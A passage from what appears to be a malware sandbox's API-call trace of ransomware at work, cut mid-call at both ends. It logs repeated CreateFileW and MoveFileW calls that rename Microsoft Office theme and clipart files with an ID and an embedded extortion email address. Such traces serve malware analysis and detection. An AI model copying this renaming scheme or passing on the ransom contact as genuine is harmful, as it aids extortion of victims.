dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.021] CloseHandle (hObject=0x530) returned 1 [0175.022] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.022] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02187_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.022] CloseHandle (hObject=0x530) returned 1 [0175.023] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.023] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02198_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.023] CloseHandle (hObject=0x530) returned 1 [0175.024] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.024] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02201_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.024] CloseHandle (hObject=0x530) returned 1 [0175.025] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.025] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02214_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.025] CloseHandle (hObject=0x530) returned 1 [0175.026] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.026] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02218_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.026] CloseHandle (hObject=0x530) returned 1 [0175.027] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.027] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Facet.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\facet.thmx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.027] CloseHandle (hObject=0x530) returned 1 [0175.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Integral.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\integral.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Integral.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\integral.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.231] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion Boardroom.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion boardroom.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion Boardroom.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion boardroom.thmx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0175.233] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.233] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange Red.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange red.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.233] CloseHandle (hObject=0x538) returned 1 [0175.234] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.234] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.234] CloseHandle (hObject=0x538) returned 1 [0175.235] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.235] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Paper.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\paper.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.235] CloseHandle (hObject=0x538) returned 1 [0175.236] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.236] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Orange.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red orange.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.236] CloseHandle (hObject=0x538) returned 1 [0175.237] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.237] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Violet.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red violet.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.237] CloseHandle (hObject=0x538) returned 1 [0175.238] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.238] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.238] CloseHandle (hObject=0x538) returned 1 [0175.239] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.239] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Slipstream.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\slipstream.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.239] CloseHandle (hObject=0x538) returned 1 [0175.240] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.240] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet II.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet ii.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.240] CloseHandle (hObject=0x538) returned 1 [0175.241] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.241] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Violet.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\violet.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.241] CloseHandle (hObject=0x538) returned 1 [0175.242] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.242] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow Orange.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow orange.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.242] CloseHandle (hObject=0x538) returned 1 [0175.243] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.243] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Yellow.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\yellow.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.243] CloseHandle (hObject=0x538) returned 1 [0175.246] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.246] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial Black-Arial.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial black-arial.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.246] CloseHandle (hObject=0x538) returned 1 [0175.247] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.247] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial-Times New Roman.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial-times new roman.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.248] CloseHandle (hObject=0x538) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.249] CloseHandle (hObject=0x538) returned 1 [0175.249] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.249] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri Light-Constantia.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri light-constantia.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.250] CloseHandle (hObject=0x538) returned 1 [0175.250] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.250] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri-Cambria.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri-cambria.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.250] CloseHandle (hObject=0x538) returned 1 [0175.251] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.251] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.254] CloseHandle (hObject=0x538) returned 1 [0175.255] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.255] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Cambria.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\cambria.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.255] CloseHandle (hObject=0x538) returned 1 [0175.256] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.256] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Candara.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\candara.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.256] CloseHandle (hObject=0x538) returned 1 [0175.261] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.262] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic-Palatino Linotype.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic-palatino linotype.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.262] CloseHandle (hObject=0x538) returned 1 [0175.273] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.273] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.273] CloseHandle (hObject=0x538) returned 1 [0175.274] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.274] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Schoolbook.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century schoolbook.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.274] CloseHandle (hObject=0x538) returned 1 [0175.280] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.280] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Consolas-Verdana.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\consolas-verdana.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.280] CloseHandle (hObject=0x538) returned 1 [0175.286] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.286] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Constantia-Franklin Gothic Book.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\constantia-franklin gothic book.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.287] CloseHandle (hObject=0x538) returned 1 [0175.287] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.287] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Corbel.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\corbel.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 